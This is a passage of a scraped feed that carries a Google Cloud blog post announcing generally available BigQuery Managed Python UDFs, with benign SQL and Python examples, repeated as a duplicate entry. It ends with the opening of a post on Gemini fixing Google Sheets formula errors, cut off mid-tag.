&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Tight external API integration:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Clean and enrich your BigQuery tables in real time by calling external web APIs or Google Cloud services such as Cloud Translation, Gemini Enterprise Agent Platform or custom microservices securely within your queries.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Fully managed and serverless:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; BigQuery handles the underlying container infrastructure and auto-scales performance dynamically.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Code example &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is an example of a Python UDF that utilizes a popular Python package —&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; beautifulsoup&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; — to remove HTML tags. We use this function to process &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StackOverflow answer bodies that are stored in a BigQuery public table:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;CREATE OR REPLACE FUNCTION `your_project.your_dataset.clean_html`(html_content STRING)\r\nRETURNS STRING\r\nLANGUAGE python\r\nOPTIONS (\r\n  runtime_version = \&amp;#x27;python-3.11\&amp;#x27;,\r\n  entry_point = \&amp;#x27;strip_tags\&amp;#x27;,\r\n  packages = [\&amp;#x27;beautifulsoup4&amp;gt;=4.12.0\&amp;#x27;]\r\n) AS r\&amp;#x27;\&amp;#x27;\&amp;#x27;\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef strip_tags(html_content):\r\n    if not html_content:\r\n        return &amp;quot;&amp;quot;\r\n    soup = BeautifulSoup(html_content, &amp;quot;html.parser&amp;quot;)\r\n    return soup.get_text(separator=&amp;quot; &amp;quot;)\r\n\&amp;#x27;\&amp;#x27;\&amp;#x27;;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f857b88ce80&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;How to query it:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT \r\n  id, \r\n  `your_project.your_dataset.clean_html`(body) AS cleaned_answer_body\r\nFROM \r\n  `bigquery-public-data.stackoverflow.posts_answers`\r\nLIMIT 100&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f857b88c760&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Advanced capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For advanced users, Python UDF adds a set of capabilities to tune the performance as well as monitor the usage. Here are some examples. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Vectorized processing with Pandas PyArrow&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To maximize throughput, the GA release supports direct processing of vectorized input as PyArrow RecordBatches. By processing columns of data in bulk rather than row-by-row, PyArrow eliminates Python serialization and conversion overhead, boosting performance by up to 10x for data-intensive calculations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Configurable container resources&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;For heavy-duty data science and ML data preparation, you can now provision container memory (up to 16 GB) and CPU (up to 4 vCPUs) per function. This enables memory-intensive workloads (such as loading large serialized models or geospatial datasets) to run directly within the sandbox.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Customizable concurrency&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Optimize your throughput and resource efficiency by configuring concurrent requests per container (up to 1,000 concurrent operations). This helps ensure that your scale-out execution is highly cost-effective and performs exceptionally well under heavy parallel loads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Streaming logs and real-time metrics&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Easily d&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ebug and monitor your production workloads. The BigQuery console now features a direct link from your query results to real-time CPU, memory, and concurrency metrics in Cloud Monitoring.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Billing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery Managed Python UDF are billed with &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery/pricing#bigquery-services-pricing"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Services SKU&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This SKU is fully eligible for &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery spend commitment-based usage discounts (CUDs)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing you to maximize budget efficiency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also get cost observability through &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;INFORMATION_SCHEMA.JOBS &lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;as well as using billing labels &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;MANAGED_ROUTINE_EXECUTION&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;MANAGED_ROUTINE_BUILD&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;See more details in the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python#pricing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pricing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; section of the documentation. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To get started with BigQuery Python UDFs, first check out &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;product documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, try out the functions &lt;/span&gt;&lt;a href="https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1sbigquery-public-data!2spython_udfs!3stokenize"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;published&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the public BigQuery dataset. For example, run the following code in a BigQuery project to tokenize country names data from BigQuery public data. Under the hood, the token UDF utilizes the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;o200k_base&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; tokenizer library.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT \r\n  country_code,\r\n  country_name,\r\n  `bigquery-public-data`.python_udfs.tokenize(country_name) AS name_tokens,\r\n  ARRAY_LENGTH(`bigquery-public-data`.python_udfs.tokenize(country_name)) AS token_count\r\nFROM \r\n  `bigquery-public-data.census_bureau_international.country_names_area`\r\nORDER BY \r\n  country_name&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f857b88c3d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Or, try out this &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/managed-python-udfs" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;code lab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to explore some advanced scenarios. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, to learn how to implement other advanced design patterns, we encourage you to explore our official public documentation guides: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Calling Google Cloud or online services (with connections):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To connect to first-party Google Cloud services such as Gemini Enterprise Agent Platform or Cloud Translation, or external API endpoints securely using Cloud Resource connections, - check out the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python#use-online-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Call Google Cloud or online services in Python code guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery DataFrames (BigFrames) Python UDFs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To learn how to write, deploy, and scale custom Python functions natively from standard Jupyter notebook or Colab environments using BigQuery DataFrames, visit the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python#bigquery-dataframes_1"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Customize Python functions for BigQuery DataFrames guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Bring your Python workflows out of isolation and directly into the heart of your data warehouse today!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/python-udf-in-bigquery-now-generally-available" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-22T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/python-udf-in-bigquery-now-generally-available/</id>
    <title>Boost BigQuery with Python: Managed Python UDFs now generally available</title>
    <updated>2026-06-22T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SQL is the industry standard for high-performance structured data analysis. However, expressing complex procedural logic, scientific computations, advanced string manipulations, or machine learning workflows in pure SQL can be highly challenging, if not impossible. That kind of work is better done with Python. Data practitioners often take on additional infrastructure management tasks &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;—&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; maintaining custom images and containers, and working with additional compute services — just to run simple helper functions with custom Python code and libraries. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we are thrilled to announce the general availability (GA) of&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; BigQuery Managed Python User-Defined Functions ( UDFs)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This launch represents a major milestone in BigQuery’s extensibility strategy, allowing data scientists, engineers, and analysts to execute custom Python code directly and securely inside BigQuery using standard SQL queries or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/bigquery-dataframes-introduction"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery DataFrames&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (BigFrames) in Python. With this release, Python UDFs are fully supported for production enterprise workloads and completely integrated into BigQuery's billing SKUs. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Bridging SQL and the Rich Python Ecosystem&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery Managed Python UDFs run on BigQuery-managed serverless resources that automatically scales to billions of rows, without having to set up infrastructure or manage containers. BigQuery automatically handles the compilation, image building, security patching, deployment, and execution of your Python code, making it super simple to use Python functions in your SQL.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Core benefits&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Flexibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Access the vast Python ecosystem — including top-tier scientific and mathematical libraries like NumPy, SciPy, pandas, scikit-learn and more — directly in your SQL select statements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Tight external API integration:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Clean and enrich your BigQuery tables in real time by calling external web APIs or Google Cloud services such as Cloud Translation, Gemini Enterprise Agent Platform or custom microservices securely within your queries.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Fully managed and serverless:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; BigQuery handles the underlying container infrastructure and auto-scales performance dynamically.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Code example &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here is an example of a Python UDF that utilizes a popular Python package —&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; beautifulsoup&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; — to remove HTML tags. We use this function to process &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StackOverflow answer bodies that are stored in a BigQuery public table:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;CREATE OR REPLACE FUNCTION `your_project.your_dataset.clean_html`(html_content STRING)\r\nRETURNS STRING\r\nLANGUAGE python\r\nOPTIONS (\r\n  runtime_version = \&amp;#x27;python-3.11\&amp;#x27;,\r\n  entry_point = \&amp;#x27;strip_tags\&amp;#x27;,\r\n  packages = [\&amp;#x27;beautifulsoup4&amp;gt;=4.12.0\&amp;#x27;]\r\n) AS r\&amp;#x27;\&amp;#x27;\&amp;#x27;\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef strip_tags(html_content):\r\n    if not html_content:\r\n        return &amp;quot;&amp;quot;\r\n    soup = BeautifulSoup(html_content, &amp;quot;html.parser&amp;quot;)\r\n    return soup.get_text(separator=&amp;quot; &amp;quot;)\r\n\&amp;#x27;\&amp;#x27;\&amp;#x27;;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f38913b6160&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;How to query it:&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT \r\n  id, \r\n  `your_project.your_dataset.clean_html`(body) AS cleaned_answer_body\r\nFROM \r\n  `bigquery-public-data.stackoverflow.posts_answers`\r\nLIMIT 100&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f38913b60a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Advanced capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For advanced users, Python UDF adds a set of capabilities to tune the performance as well as monitor the usage. Here are some examples. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Vectorized processing with Pandas PyArrow&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To maximize throughput, the GA release supports direct processing of vectorized input as PyArrow RecordBatches. By processing columns of data in bulk rather than row-by-row, PyArrow eliminates Python serialization and conversion overhead, boosting performance by up to 10x for data-intensive calculations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Configurable container resources&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;For heavy-duty data science and ML data preparation, you can now provision container memory (up to 16 GB) and CPU (up to 4 vCPUs) per function. This enables memory-intensive workloads (such as loading large serialized models or geospatial datasets) to run directly within the sandbox.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Customizable concurrency&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Optimize your throughput and resource efficiency by configuring concurrent requests per container (up to 1,000 concurrent operations). This helps ensure that your scale-out execution is highly cost-effective and performs exceptionally well under heavy parallel loads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Streaming logs and real-time metrics&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Easily d&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ebug and monitor your production workloads. The BigQuery console now features a direct link from your query results to real-time CPU, memory, and concurrency metrics in Cloud Monitoring.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Billing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery Managed Python UDF are billed with &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery/pricing#bigquery-services-pricing"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Services SKU&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This SKU is fully eligible for &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery spend commitment-based usage discounts (CUDs)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing you to maximize budget efficiency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can also get cost observability through &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;INFORMATION_SCHEMA.JOBS &lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;as well as using billing labels &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;MANAGED_ROUTINE_EXECUTION&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;MANAGED_ROUTINE_BUILD&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;See more details in the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python#pricing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Pricing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; section of the documentation. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To get started with BigQuery Python UDFs, first check out &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;product documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, try out the functions &lt;/span&gt;&lt;a href="https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1sbigquery-public-data!2spython_udfs!3stokenize"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;published&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in the public BigQuery dataset. For example, run the following code in a BigQuery project to tokenize country names data from BigQuery public data. Under the hood, the token UDF utilizes the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;o200k_base&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; tokenizer library.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT \r\n  country_code,\r\n  country_name,\r\n  `bigquery-public-data`.python_udfs.tokenize(country_name) AS name_tokens,\r\n  ARRAY_LENGTH(`bigquery-public-data`.python_udfs.tokenize(country_name)) AS token_count\r\nFROM \r\n  `bigquery-public-data.census_bureau_international.country_names_area`\r\nORDER BY \r\n  country_name&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f38913b6130&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Or, try out this &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/managed-python-udfs" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;code lab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to explore some advanced scenarios. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, to learn how to implement other advanced design patterns, we encourage you to explore our official public documentation guides: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Calling Google Cloud or online services (with connections):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To connect to first-party Google Cloud services such as Gemini Enterprise Agent Platform or Cloud Translation, or external API endpoints securely using Cloud Resource connections, - check out the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python#use-online-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Call Google Cloud or online services in Python code guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;BigQuery DataFrames (BigFrames) Python UDFs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To learn how to write, deploy, and scale custom Python functions natively from standard Jupyter notebook or Colab environments using BigQuery DataFrames, visit the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python#bigquery-dataframes_1"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Customize Python functions for BigQuery DataFrames guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Bring your Python workflows out of isolation and directly into the heart of your data warehouse today!&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/python-udf-in-bigquery-now-generally-available/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-22T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html</id>
    <title>Troubleshoot formula errors quickly with Gemini in Google Sheets</title>
    <updated>2026-06-22T16:51:44+00:00</updated>
    <content type="html">We’re excited to introduce a new Gemini in Sheets capability that enables you to diagnose and fix formula errors in one click. When you encounter a formula error, Gemini can analyze the surrounding data structure to help provide an easy-to-understand explanation of the core issue alongside a corrected version of the formula. The functionality seamlessly supports everything from basic arithmetic to highly intricate calculations, simplifying what is traditionally a frustrating and time-consuming debugging process.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Since Gemini is built directly in Sheets, it removes the barrier to writing complex formulas for advanced analysis right where you work. This ensures that both novice users and seasoned data analysts can maintain momentum without having to manually parse error messages  or search external forums for solutions.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj54O1iuI_zo73h7DxjdUotXnXPCy5QoXjqanpDeLFxBtND8cT1lW5O_3dgdk4ZNug0rcr0mAYb9ZDWq-OUenzTFGq15jOWYytNLNGaRF3v_KdD49a8Qn3Fb-NUYdmObq6mbBQS73HNGvygUWiupJaSmhntyZWp-Oit_8MeZ_B86laurorGaoy1wQMAIBJ8/s2000/Formula%20Fixer.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img alt="GIF showing formula fixing functionality" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj54O1iuI_zo73h7DxjdUotXnXPCy5QoXjqanpDeLFxBtND8cT1lW5O_3dgdk4ZNug0rcr0mAYb9ZDWq-OUenzTFGq15jOWYytNLNGaRF3v_KdD49a8Qn3Fb-NUYdmObq6mbBQS73HNGvygUWiupJaSmhntyZWp-Oit_8MeZ_B86laurorGaoy1wQMAIBJ8/s16000/Formula%20Fixer.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is available by default if &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Sheets&lt;/a&gt; is enabled.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;You must have &lt;a href="https://support.google.com/mail/answer/15604322?sjid=17363988672514456782-NA#gw&amp;amp;zippy=%2Csmart-features-in-google-workspace%2Cwhat-are-googles-legal-bases-of-processing-for-users-in-the-european-economic-area-united-kingdom-or-switzerland%2Chow-long-is-your-workspace-content-activity-used-to-provide-smart-features-and-to-improve-these-features" target="_blank"&gt;Workspace smart features&lt;/a&gt; enabled to take advantage of these features. Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16959434" target="_blank"&gt;learn more about building and editing spreadsheets with Gemini in Sheets&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Note: Through July 15, 2026, Workspace customers will get promotional access to higher limits for the improved Gemini in Sheets experience, allowing users to experiment with this feature.. Per-user usage limits will apply after July 15; we’ll provide more information in the Help Center in advance of updated usage limits going into effect.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: 